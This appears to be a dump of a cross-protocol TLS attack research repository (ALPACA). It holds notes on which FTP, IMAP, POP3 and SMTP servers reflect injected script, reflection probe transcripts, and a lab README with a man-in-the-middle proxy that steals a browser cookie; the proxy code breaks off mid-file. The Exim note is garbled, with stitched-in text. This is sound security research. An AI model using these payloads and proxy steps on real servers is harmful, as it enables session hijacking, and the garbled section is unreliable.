-t tls-vsftpd -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | vsftpd: 8 | image: tls-vsftpd 9 | scanner: 10 | image: tlsscanner 11 | depends_on: 12 | - vsftpd 13 | command: [ "-connect", "vsftpd:21", "-server_name", "tls-server.com", "-starttls", "ftp", "-scanDetail", "QUICK"] -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-servers/vsftpd/start.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #echo test 3 | touch /var/log/vsftpd.log 4 | /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf & tail -f /var/log/vsftpd.log 5 | #rc-update add vsftpd default 6 | #rc-service vsftpd restart 7 | #tail -f /var/log/vsftpd.log -------------------------------------------------------------------------------- /exploits/ftp/01-pureftpd.md: -------------------------------------------------------------------------------- 1 | ## Pure-FTPd 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | Pure-FTPd | 1.0.47, 1.0.49 6 | 7 | The homepage of PureFTPd is https://www.pureftpd.org/. 8 | 9 | We used a [Docker image][1] by the GitHub user `jedisct1`, based on 10 | another one by the user `stilliard`. 11 | 12 | [1]: https://github.com/jedisct1/pure-ftpd/ 13 | 14 | Pure-FTPd requires capability support, which is not available in 15 | Docker. So, a special Docker image is used which compiles pure-ftpd 16 | from source with that option disabled. 
17 | 18 | ``` 19 | $ docker run -d --name ftpd_server -p 21:21 -p 30000-30009:30000-30009 -e "PUBLICHOST=localhost" stilliard/pure-ftpd 20 | ``` 21 | 22 | However, we also tested on NixOS with version 1.0.49 and could 23 | reproduce the same results with that version: 24 | 25 | ``` 26 | $ nix-shell -p pure-ftpd; sudo pure-ftpd 27 | ``` 28 | 29 | ### HTTP Detection 30 | 31 | Pure-FTPd detects and blocks HTTP POST requests. 32 | 33 | This protection is disabled if PureFTPd is compiled with the flag 34 | `--enable-minimal` (which is recommended to be used for embedded 35 | systems). Extract from the [source code][2]: 36 | 37 | [2]: https://github.com/jedisct1/pure-ftpd/blob/4828633d9cb42cd77d764e7d1cb3d0c04c5df001/src/ftp_parser.c#L429 38 | 39 | ``` 40 | #ifndef MINIMAL 41 | } else if (!strcmp(cmd, "connect") || 42 | !strcmp(cmd, "delete") || 43 | !strcmp(cmd, "get") || 44 | !strcmp(cmd, "head") || 45 | !strcmp(cmd, "options") || 46 | !strcmp(cmd, "post") || 47 | !strcmp(cmd, "put")) { 48 | die(500, LOG_INFO, "HTTP command: [%s]", cmd); 49 | } else if (!strcmp(cmd, "help")) { 50 | goto help_site; 51 | #endif 52 | ``` 53 | 54 | ### Error Tolerance 55 | 56 | Yes, at least 100 errors allowed. 57 | 58 | ### Reflection 59 | 60 | Yes, pre-auth. 61 | 62 | ``` 63 | TYPE 64 | 504-Unknown TYPE: 65 | ``` 66 | 67 | ``` 68 | USER 69 | 331 User OK. Password required 70 | ``` 71 | 72 | ### Additional Notes 73 | 74 | Pure-FTPd has support for SNI since version 1.0.48 (March 25, 2019). 75 | -------------------------------------------------------------------------------- /exploits/ftp/02-proftpd.md: -------------------------------------------------------------------------------- 1 | ## ProFTPD 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | ProFTPD | 1.3.7a 6 | 7 | The homepage of ProFTPD is http://www.proftpd.org/. 8 | 9 | We used a [ProFTPD Docker image][1] by GitHub user "instantlinux". 
This was started with the command: 10 | 11 | ``` 12 | docker run -d --name ftpd_server -p 21:21 -p 30000-30009:30000-30009 -e "PASV_ADDRESS=localhost" instantlinux/proftpd 13 | ``` 14 | 15 | [1]: https://github.com/instantlinux/docker-tools.git 16 | 17 | ### HTTP Detection 18 | 19 | Yes, ProFTPD since version 1.3.5e detects POST requests as a 20 | mitigation to cross-protocol attacks reported by Jann Horn. 21 | 22 | ``` 23 | POST / HTTP/1.1 24 | Connection closed by foreign host. 25 | 26 | Connection-Type: keep-alive 27 | 500 CONNECTION-TYPE: not understood 28 | ``` 29 | 30 | ### Error Tolerance 31 | 32 | Yes, at least 100 errors allowed. 33 | 34 | ### Reflection 35 | 36 | Yes, pre-auth. 37 | 38 | ``` 39 | TYPE 40 | 504 TYPE not implemented for '' parameter 41 | ``` 42 | 43 | ``` 44 | USER 45 | 331 Password required for 46 | ``` 47 | -------------------------------------------------------------------------------- /exploits/ftp/03-microsoft-ftp.md: -------------------------------------------------------------------------------- 1 | ## Pure-FTPd 2 | 3 | Name | Version 4 | :------------------------|:------------------------------- 5 | Microsoft IIS FTP Server | IIS 10.0.19041.322 (Windows 10) 6 | 7 | Microsoft IIS FTP Server is included with the Windows operating system. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request. 12 | 13 | ### Error Tolerance 14 | 15 | Yes, at least 100 errors allowed. 16 | 17 | ### Reflection 18 | 19 | Yes, pre-auth. For example: 20 | 21 | ``` 22 | LANG 23 | 502 Language not supported. 24 | ``` 25 | 26 | ``` 27 | HELP 28 | 501 'HELP ': parameter not understood. 29 | ``` 30 | -------------------------------------------------------------------------------- /exploits/ftp/04-vsftpd.md: -------------------------------------------------------------------------------- 1 | ## vsftpd 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | vsftpd | 3.0.3 6 | 7 | The homepage of vsftpd is https://security.appspot.com/vsftpd.html. 
8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request pre-auth. 12 | 13 | There is a detection of POST requests post-auth, but that is 14 | ineffective in mitigating cross-protocol attacks. 15 | 16 | ``` 17 | POST / HTTP/1.1 18 | 530 Please login with USER and PASS. 19 | USER anonymous 20 | 230 Login successful. 21 | POST / HTTP/1.1 22 | 500 HTTP protocol commands not allowed. 23 | Connection closed by foreign host. 24 | ``` 25 | 26 | ### Error Tolerance 27 | 28 | Yes, at least 100 errors allowed. 29 | 30 | ### Reflection 31 | 32 | No reflections found pre-auth. 33 | 34 | Post-auth, a reflection is only possible for a user with write permission, using a bypass from [OWASP][1]: 35 | 36 | ``` 37 | ftp> mkdir "" 38 | 257 "/home/marcus/foo/" created 39 | ``` 40 | 41 | [1]: https://owasp.org/www-community/xss-filter-evasion-cheatsheet 42 | -------------------------------------------------------------------------------- /exploits/ftp/05-filezilla.md: -------------------------------------------------------------------------------- 1 | ## FileZilla 2 | 3 | Name | Version 4 | :---------|:----------- 5 | FileZilla | 0.9.60 beta 6 | 7 | The homepage of FileZilla is https://filezilla-project.org/. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request. 12 | 13 | ### Error Tolerance 14 | 15 | Yes, at least 100 errors allowed. 16 | 17 | ### Reflection 18 | 19 | Yes, pre-auth. 20 | 21 | ``` 22 | USER 23 | 331 Password required for 24 | ``` 25 | -------------------------------------------------------------------------------- /exploits/ftp/06-serv-u.md: -------------------------------------------------------------------------------- 1 | ## Serv-U 2 | 3 | Name | Version 4 | :---------|:--------------------- 5 | Serv-U | 15.2.1 (14 day trial) 6 | 7 | The homepage of Serv-U FTP Server is https://www.serv-u.com/ftp-server-software. 8 | 9 | ### HTTP Detection 10 | 11 | No detection of POST request. 12 | 13 | ### Error Tolerance 14 | 15 | Yes, at least 100 errors allowed. 
16 | 17 | ### Reflection 18 | 19 | Yes, pre-auth. 20 | 21 | ``` 22 | HELP 23 | 501 '': HELP unknown command. 24 | ``` 25 | -------------------------------------------------------------------------------- /exploits/imap/01-dovecot.md: -------------------------------------------------------------------------------- 1 | ## Dovecot IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Dovecot (IMAP) | 2.4.devel 6 | 7 | ### HTTP Detection 8 | 9 | Dovecot IMAP does not detect HTTP requests. 10 | 11 | ``` 12 | S: * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ STARTTLS LOGINDISABLED] Dovecot ready. 13 | C: GET /get HTTP/1.1 14 | S: GET BAD Error in IMAP command received by server. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Dovecot aborts the connection after three errors. 21 | 22 | ### Reflection 23 | 24 | No reflection found pre-auth. 25 | 26 | Post-auth, a reflection was found in the `SELECT` command (see 27 | below). 28 | 29 | ``` 30 | C: MrogJcxL SELECT {25+} 31 | 32 | MrogJcxL NO Mailbox doesn't exist: (0.001 + 0.000 secs). 33 | S: 34 | ``` 35 | 36 | ### Additional Notes 37 | 38 | In addition to the post-auth reflection in `SELECT`, some more 39 | commands reflect a limited range of characters post-auth. 40 | 41 | ``` 42 | # 1 43 | C: 5tC2DHro APPEND F1SbF2mm (by52U6Nv) {4} 44 | S: 5tC2DHro NO [TRYCREATE] Mailbox doesn't exist: F1SbF2mm (0.001 + 0.000 secs). 45 | * BAD Error in IMAP command : Unknown command (0.001 + 0.000 secs). 46 | # 3 47 | C: oLwzmRAU DELETE lLD1OZ5m 48 | S: oLwzmRAU NO [NONEXISTENT] Mailbox doesn't exist: lLD1OZ5m (0.010 + 0.000 + 0.009 secs). 49 | # 4 50 | C: iTnRlIKC EXAMINE As7bHlRP 51 | S: iTnRlIKC NO Mailbox doesn't exist: As7bHlRP (0.001 + 0.000 secs). 52 | # 7 53 | C: cEAgkcG5 RENAME 96zafyjR uYLSxc0t 54 | S: cEAgkcG5 NO [NONEXISTENT] Mailbox doesn't exist: 96zafyjR (0.008 + 0.000 + 0.007 secs). 
55 | # 8 56 | C: RVf9dGgb SELECT 4DblObyT 57 | S: RVf9dGgb NO Mailbox doesn't exist: 4DblObyT (0.001 + 0.000 secs). 58 | # 9 59 | C: Ssoh6gb8 STATUS CHDkHjkQ (UIDVALIDITY) 60 | S: Ssoh6gb8 NO Mailbox doesn't exist: CHDkHjkQ (0.001 + 0.000 secs). 61 | # 10 62 | C: vELO4cIk SUBSCRIBE Drxr2cdj 63 | S: vELO4cIk NO Mailbox doesn't exist: Drxr2cdj (0.001 + 0.000 secs). 64 | ``` 65 | -------------------------------------------------------------------------------- /exploits/imap/02-courier.md: -------------------------------------------------------------------------------- 1 | ## Courier IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Courier (IMAP) | 5.0.6+1.0.6-1 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK [CAPABILITY IMAP4rev1] Courier-IMAP ready. Copyright 1998-2016 Double Precision, Inc. See COPYING for distribution information. 13 | C: GET /get HTTP/1.1 14 | S: GET NO Error in IMAP command received by server. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Courier aborts the connection after ten errors. However, the 21 | counter is reset on each valid command, so a bypass may be possible if 22 | the browser provides enough flexibility in setting custom HTTP 23 | headers. 24 | 25 | ### Reflection 26 | 27 | Yes, pre-auth reflection is possible using the tag. 28 | 29 | ``` 30 | * OK [CAPABILITY IMAP4rev1] Courier-IMAP ready. Copyright 1998-2016 Double Precision, Inc. See COPYING for distribution information. 31 | xxx 32 | NO Error in IMAP command received by server. 33 | ``` 34 | 35 | -------------------------------------------------------------------------------- /exploits/imap/03-exchange.md: -------------------------------------------------------------------------------- 1 | ## Exchange IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Exchange (IMAP) | 15.20 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 
10 | 11 | ``` 12 | * OK The Microsoft Exchange IMAP4 service is ready. [(...)] 13 | GET /get HTTP/1.1 14 | GET BAD Command Error. 12 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Exchange aborts the connection after three errors. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using the tag. 25 | 26 | ``` 27 | * OK The Microsoft Exchange IMAP4 service is ready. 28 | noop 29 | OK NOOP completed. 30 | a"'<>/\{}[]() noop 31 | a"'<>/\{}[]() OK NOOP completed. 32 | ``` 33 | -------------------------------------------------------------------------------- /exploits/imap/04-cyrus.md: -------------------------------------------------------------------------------- 1 | ## Cyrus IMAP 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Cyrus (IMAP) | 3.2.4 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK [CAPABILITY IMAP4rev1 LITERAL+ ID ENABLE STARTTLS AUTH=PLAIN SASL-IR] test Cyrus IMAP 3.2.4-Debian-3.2.4-3 server ready 13 | C: GET /get HTTP/1.1 14 | S: GET BAD Please login first 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using the tag. 25 | 26 | ``` 27 | * OK [CAPABILITY IMAP4rev1 LITERAL+ ID ENABLE STARTTLS AUTH=PLAIN SASL-IR] test Cyrus IMAP 3.2.4-Debian-3.2.4-3 server ready 28 | noop 29 | OK Completed 30 | ``` 31 | -------------------------------------------------------------------------------- /exploits/imap/05-kerio-connect.md: -------------------------------------------------------------------------------- 1 | ## Kerio Connect IMAP 2 | 3 | Name | Version 4 | :--------------------|:-------------- 5 | Kerio Connect (IMAP) | 9.3.0 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK Kerio Connect 9.3.0 IMAP4rev1 server ready 13 | C: GET /get HTTP/1.1 14 | S: GET BAD Unknown command '/get' 15 | (...) 
16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using invalid commands. 25 | 26 | ``` 27 | x 28 | x BAD Unknown command '' 29 | ``` 30 | -------------------------------------------------------------------------------- /exploits/imap/06-zimbra.md: -------------------------------------------------------------------------------- 1 | ## Zimbra IMAP 2 | 3 | Name | Version 4 | :-------------|:-------------- 5 | Zimbra (IMAP) | 8.8.15 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: * OK IMAP4rev1 proxy server ready 13 | C: GET /get HTTP/1.1 14 | S: GET BAD invalid command 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | Yes, pre-auth reflection is possible using the search charset command. 25 | 26 | ``` 27 | C: X-Ignore: search charset {35+} 28 | C: ignore: 29 | S: X-Ignore: NO [BADCHARSET] parse error: unknown charset: ignore: 30 | ``` 31 | -------------------------------------------------------------------------------- /exploits/pop3/01-dovecot.md: -------------------------------------------------------------------------------- 1 | ## Dovecot POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Dovecot (POP3) | 2.4.devel 6 | 7 | ### HTTP Detection 8 | 9 | Dovecot POP3 does not detect HTTP requests. 10 | 11 | ``` 12 | S: +OK Dovecot ready. 13 | C: GET /get HTTP/1.1 14 | S: -ERR Unknown command. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Dovecot aborts the connection after three errors. The counter is 21 | reset after a valid command. 22 | 23 | ### Reflection 24 | 25 | No reflection found pre-auth. 26 | 27 | Post-auth, a reflection was found with invalid command. 
28 | 29 | ``` 30 | -- Post Auth -- 31 | 32 | -ERR Unknown command: 33 | ``` 34 | -------------------------------------------------------------------------------- /exploits/pop3/02-courier.md: -------------------------------------------------------------------------------- 1 | ## Courier POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Courier (POP3) | 5.0.6+1.0.6-1 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK Hello there. 13 | C: GET /get HTTP/1.1 14 | S: -ERR Invalid command. 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | Yes, at least 100 errors allowed. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | 26 | 27 | -------------------------------------------------------------------------------- /exploits/pop3/03-exchange.md: -------------------------------------------------------------------------------- 1 | ## Exchange POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Exchange (POP3) | 15.20 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK The Microsoft Exchange POP3 service is ready. [...] 13 | C: GET /get HTTP/1.1 14 | S: -ERR Protocol error. 19 15 | (...) 16 | ``` 17 | 18 | ### Error Tolerance 19 | 20 | No, Exchange aborts the connection after three errors. 21 | 22 | ### Reflection 23 | 24 | No reflection was found. 25 | -------------------------------------------------------------------------------- /exploits/pop3/04-cyrus.md: -------------------------------------------------------------------------------- 1 | ## Cyrus POP3 2 | 3 | Name | Version 4 | :---------------|:-------------- 5 | Cyrus (POP3) | 3.0.8 6 | 7 | ### HTTP Detection 8 | 9 | No detection of HTTP requests. 10 | 11 | ``` 12 | S: +OK test Cyrus POP3 3.2.4-Debian-3.2.4-3 server ready <7544288959592343525.1602504874@test> 13 | C: GET /get HTTP/1.1 14 | S: -ERR Unrecognized command 15 | (...) 
```

### Error Tolerance

Yes, at least 100 errors allowed.

### Reflection

No reflection was found.
-------------------------------------------------------------------------------- /exploits/pop3/05-kerio-connect.md: --------------------------------------------------------------------------------
## Kerio Connect POP3

Name | Version
:--------------------|:--------------
Kerio Connect (POP3) | 9.3.0

### HTTP Detection

No detection of HTTP requests.

```
S: +OK Kerio Connect 9.3.0 POP3 server ready <...>
C: GET /get HTTP/1.1
S: -ERR Invalid command; valid commands: USER PASS AUTH APOP STLS CAPA QUIT
(...)
```

### Error Tolerance

Yes, at least 100 errors allowed.

### Reflection

No reflection was found.
-------------------------------------------------------------------------------- /exploits/pop3/06-zimbra.md: --------------------------------------------------------------------------------
## Zimbra POP3

Name | Version
:-------------|:--------------
Zimbra (POP3) | 8.8.15

### HTTP Detection

No detection of HTTP requests.

```
S: +OK POP3 ready
C: GET /get HTTP/1.1
S: -ERR invalid command
(...)
```

### Error Tolerance

Yes, at least 100 errors allowed.

### Reflection

No reflection was found.
-------------------------------------------------------------------------------- /exploits/smtp/01-postfix.md: --------------------------------------------------------------------------------
## Postfix

Name | Version
:---------|:--------------
Postfix | 3.5.9

The homepage of Postfix is http://www.postfix.org/.

We used a [Docker image][1] by the GitHub user `bokysan`.
10 | 11 | [1]: https://github.com/bokysan/docker-postfix 12 | 13 | ``` 14 | $ docker run --rm --name postfix -e "ALLOWED_SENDER_DOMAINS=example.com" -p 1587:587 boky/postfix 15 | ``` 16 | 17 | ### HTTP Detection 18 | 19 | Postfix detects and blocks HTTP POST requests. 20 | 21 | ``` 22 | 220 1237cfa6400d ESMTP Postfix 23 | POST / HTTP/1.1 24 | 221 2.7.0 Error: I can break rules, too. Goodbye. 25 | Connection closed by foreign host. 26 | ``` 27 | 28 | ``` 29 | 220 1237cfa6400d ESMTP Postfix 30 | Header: Field 31 | 221 2.7.0 Error: I can break rules, too. Goodbye. 32 | Connection closed by foreign host. 33 | ``` 34 | 35 | ### Error Tolerance 36 | 37 | Yes. Postfix terminates the connection after 20 errors, which is 38 | sufficient in all tested browsers. The following listing only shows 39 | the server responses to an infinite stream of error commands. 40 | 41 | ``` 42 | 502 5.5.2 Error: command not recognized 43 | 502 5.5.2 Error: command not recognized 44 | 502 5.5.2 Error: command not recognized 45 | 502 5.5.2 Error: command not recognized 46 | 502 5.5.2 Error: command not recognized 47 | 502 5.5.2 Error: command not recognized 48 | 502 5.5.2 Error: command not recognized 49 | 502 5.5.2 Error: command not recognized 50 | 502 5.5.2 Error: command not recognized 51 | 502 5.5.2 Error: command not recognized 52 | 502 5.5.2 Error: command not recognized 53 | 502 5.5.2 Error: command not recognized 54 | 502 5.5.2 Error: command not recognized 55 | 502 5.5.2 Error: command not recognized 56 | 502 5.5.2 Error: command not recognized 57 | 502 5.5.2 Error: command not recognized 58 | 502 5.5.2 Error: command not recognized 59 | 502 5.5.2 Error: command not recognized 60 | 502 5.5.2 Error: command not recognized 61 | 502 5.5.2 Error: command not recognized 62 | 421 4.7.0 1237cfa6400d Error: too many errors 63 | Connection closed by foreign host. 64 | ``` 65 | ### Reflection 66 | 67 | Yes, pre-auth. 
68 | 69 | ``` 70 | 220 1237cfa6400d ESMTP Postfix 71 | HELO example.com 72 | 250 1237cfa6400d 73 | MAIL FROM: example 74 | 555 5.5.4 Unsupported option: 75 | ``` 76 | -------------------------------------------------------------------------------- /exploits/smtp/02-exim.md: -------------------------------------------------------------------------------- 1 | ## Exim 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | Exim | 4.93 6 | 7 | The homepage of Exim is https://www.exim.org/. 8 | 9 | We used a [Docker image][1] by the GitHub user `bokysan`. 10 | 11 | [1]: https://github.com/bokysan/docker-postfix 12 | 13 | ``` 14 | $ docker run --rm --name exim -p 2525:25 angelnu/exim 15 | ``` 16 | 17 | ### HTTP Detection 18 | 19 | Exim does not detect HTTP POST requests. 20 | 21 | ``` 22 | 220 d5d6ea0535e1 ESMTP Exim 4.93 Ubuntu Wed, 17 Feb 2021 19:06:27 +0000 23 | POST / HTTP/1.1 24 | 500 unrecognized command 25 | Header: Field 26 | 500 unrecognized command 27 | ``` 28 | 29 | ### Error Tolerance 30 | 31 | No. Exim only allows up to three errors before terminating the connection. 32 | 33 | ``` 34 | 220 d5d6ea0535e1 ESMTP Exim 4.93 Ubuntu Wed, 17 Feb 2021 19:09:03 +0000 35 | error 36 | 500 unrecognized command 37 | error 38 | 500 unrecognized command 39 | error 40 | 500 unrecognized command 41 | error 42 | 500 Too many unrecognized commands 43 | Connection closed by foreign host. 44 | ``` 45 | 46 | ### Reflection 47 | 48 | Yes, pre-auth. 49 | 50 | ``` 51 | MAIL FROM: 52 | 501 : malformed address: alert(1); may not follow 72 | 500 5.5.1 Command unrecognized: "" 73 | ``` 74 | -------------------------------------------------------------------------------- /exploits/smtp/04-mailenable.md: -------------------------------------------------------------------------------- 1 | ## MailEnable 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | MailEnable| 10.32 (Free) 6 | 7 | The homepage of MailEnable is https://www.mailenable.com/. 
8 | 9 | ### HTTP Detection 10 | 11 | MailEnable does not detect HTTP POST requests. 12 | 13 | ``` 14 | 229 DESKTOP-UPDDRIK.example.com ESMTP MailEnable Service, Version: 10.32-- ready at 02/17/21 22:57:03 15 | POST / HTTP/11 16 | 503 Bad sequence of commands 17 | ``` 18 | 19 | ### Error Tolerance 20 | 21 | Yes, with bypass. MailEnable accepts only 15 errors before terminating 22 | the connection, but it will process all pending commands in the input 23 | buffer before terminating. 24 | 25 | ### Reflection 26 | 27 | We could not find any reflections in MailEnable. 28 | -------------------------------------------------------------------------------- /exploits/smtp/05-mdaemon.md: -------------------------------------------------------------------------------- 1 | ## MDaemon 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | MDaemon | 21.0.0 6 | 7 | The homepage of MDaemon is https://www.altn.com/. 8 | 9 | ### HTTP Detection 10 | 11 | MDaemon does not recognize or block POST requests. 12 | 13 | ``` 14 | 220 example.com ESMTP Thu, 18 Feb 2021 00:41:24 +0100 15 | POST / HTTP/1.1 16 | 500 5.0.0 Unrecognized command 17 | ``` 18 | 19 | ### Error Tolerance 20 | 21 | No. MDaemon only allows up to three errors before terminating the connection. 22 | 23 | ### Reflection 24 | 25 | Yes, pre-auth. 26 | 27 | ``` 28 | HELO 29 | 250 example.com Hello [::1], pleased to meet you 30 | ``` 31 | -------------------------------------------------------------------------------- /exploits/smtp/06-opensmtpd.md: -------------------------------------------------------------------------------- 1 | ## OpenSMTPD 2 | 3 | Name | Version 4 | :---------|:-------------- 5 | OpenSMTPD | 6.7.1p1 6 | 7 | The homepage of OpenSMTPD is https://www.opensmtpd.org/. 8 | 9 | ### HTTP Detection 10 | 11 | OpenSMTPD does not recognize or block POST requests. 
```
220 church ESMTP OpenSMTPD
POST / HTTP/1.1
500 5.5.1 Invalid command: Command unrecognized
Header: Field
500 5.5.1 Invalid command: Command unrecognized
```

### Error Tolerance

Yes, at least 100 errors allowed.

### Reflection

Yes, pre-auth.

```
EHLO example.com
250-church Hello example.com [127.0.0.1], pleased to meet you
250-8BITMIME
250-ENHANCEDSTATUSCODES
250-SIZE 36700160
250-DSN
250 HELP
MAIL FROM:
503 5.5.4 Invalid command arguments: Unsupported option
```

### Additional Notes

OpenSMTPD is not exploitable, because it does not support command
pipelining. As the browser sends multiple lines at once, the
connection will be terminated early.

-------------------------------------------------------------------------------- /testlab/.gitignore: --------------------------------------------------------------------------------
pki
servers/files/cert
*.pyc
-------------------------------------------------------------------------------- /testlab/README.md: --------------------------------------------------------------------------------
# Cross-Protocol Testlab

Currently only the attacks on vsftp work in the lab, because the email servers in the provided docker images are the latest versions, in which ALPACA is already fixed.
We are currently working on adding the old server versions to the repository.

All code provided is experimental and may harm your system. Please use a fresh Ubuntu machine, ideally a throw-away VM: the setup runs as root, generates a lab CA that you are asked to trust in Firefox, and adds a second loopback address.

## Setup

**1. PLEASE USE A FRESH UBUNTU!**

**2. Become root on the machine**
```
sudo -i
```

**3. Install docker as described on https://docs.docker.com/engine/install/ubuntu/**

**4. 
Install python3 and docker-compose**
```
apt-get install python3 python3-pip
pip3 install docker-compose
```

**5. Run ```./setup.sh```**
```
chmod +x setup.sh
./setup.sh
```

**6. Add ./pki/ca.crt to your Firefox trusted CAs**
After `setup.sh` has run, `./pki/` holds the lab's private CA. Any browser that trusts `ca.crt` will accept a certificate for *any* hostname signed with the matching private key, so import it only into a dedicated Firefox profile used for this lab and remove it from the trust store when you are done (the `pki` directory is git-ignored, so the key is not committed, but it still lives on this machine).
If Firefox does not run as root, copy the certificate to your user's home directory and make it readable for that user. A certificate is public data, so read-only permissions are sufficient:
```
cp ./pki/ca.crt /home/<user>/
chown <user> /home/<user>/ca.crt
chmod 644 /home/<user>/ca.crt
```
The setup is now complete and can be used.

Important: if you reboot after the setup, you have to manually add the second loopback IP again (the proxy binds the attacker address to it):
```
ip addr add 127.0.0.2/8 dev lo
```
## FTPS

Make sure that:
1. you have installed the CA certificate as described above into your Firefox!

2. your loopback interface has a second IP address (127.0.0.2/8)!


Start the docker services
```
docker-compose -f servers/docker-compose.yml up -d nginx-target nginx-attacker vsftp
```
Run the MitM proxy. By default it listens on 127.0.0.2:443, which is why it has to run as root; the option is called `--protocol` in `main.py` (`--proto` only works because argparse accepts unambiguous prefixes):
```
cd mitmproxy
python3 main.py --protocol FTP --attacker_ip 127.0.0.2 127.0.0.1 21
```

The proxy is now running in unarmed mode, i.e. it relays the browser's TLS session unchanged to the real HTTPS server. You can open Firefox and visit https://target.com.
The server on target.com will set a cookie with the displayed session ID.

After that, switch the proxy to armed mode by pressing any key in the console window. Note that toggling the armed state closes every connection the proxy has accepted so far.

Open a second console window and execute ```scripts/show_vsftp_log.sh``` to display the FTP log.

Navigate in Firefox to https://attacker.com.
Here you can choose between two attacks (Upload and Download).

1. Download

If you click on Download, you will see a white page for approx. 5 seconds, then the browser redirects to target.com and shows an alert box.

2. Upload

If you click on Upload, the browser will navigate to the attack page and then, after 5 seconds, redirect to target.com.
78 | In the second console windows with the logs you can now also see the uploaded GET request of the browser including the cookie. 79 | 80 | -------------------------------------------------------------------------------- /testlab/mitmproxy/main.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import argparse 3 | 4 | from proxy.socket.mitmsocket import MITMSocketProxy 5 | from utils.logging import init_logging, _info 6 | 7 | parser = argparse.ArgumentParser(prog='MITMProxy') 8 | parser.add_argument('target_ip', help='Target IP') 9 | parser.add_argument('target_port', type=int, help='Target PORT') 10 | parser.add_argument('--attacker_ip', help='Attacker IP', required=False) 11 | parser.add_argument('--attacker_port', type=int, help='Attacker Port', required=False) 12 | parser.add_argument('--log_level', choices=['DEBUG', 'INFO'], help='Log Level', required=False) 13 | parser.add_argument('--protocol', choices=['FTP', 'POP3', 'POP3S', 'IMAP', 'IMAPS', 'SMTP'], help='Protocol', required=False) 14 | 15 | parser.set_defaults(attacker_ip="127.0.0.2", attacker_port=443, log_level='INFO', protocol='FTP') 16 | args = parser.parse_args() 17 | init_logging(args.log_level) 18 | 19 | _info("main", 20 | f"Starting socket proxy redirecting from {args.attacker_ip}:{args.attacker_port} to {args.target_ip}:{args.target_port} for protocol {args.protocol}") 21 | 22 | proxy = MITMSocketProxy(args.attacker_ip, args.attacker_port, args.target_ip, args.target_port, args.protocol) 23 | proxy.run() 24 | -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/proxy/__init__.py -------------------------------------------------------------------------------- 
/testlab/mitmproxy/proxy/socket/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/RUB-NDS/alpaca-code/6b939f3592505b5c446be97fcf99005008986d05/testlab/mitmproxy/proxy/socket/__init__.py -------------------------------------------------------------------------------- /testlab/mitmproxy/proxy/socket/mitmsocket.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import socket 3 | 4 | from _thread import * 5 | 6 | from proxy.socket.protocols.ftp import FTPHandler 7 | from proxy.socket.protocols.imap import IMAPHandler 8 | from proxy.socket.protocols.imaps import IMAPSHandler 9 | from proxy.socket.protocols.pop3 import POP3Handler 10 | from proxy.socket.protocols.pop3s import POP3SHandler 11 | from proxy.socket.protocols.smtp import SMTPHandler 12 | from utils.common import AddressInfo 13 | from utils.logging import _info 14 | 15 | protocol_handler = {'FTP': FTPHandler, 'POP3': POP3Handler, 'POP3S': POP3SHandler, 'IMAP':IMAPHandler,'IMAPS':IMAPSHandler, 'SMTP': SMTPHandler} 16 | 17 | 18 | class 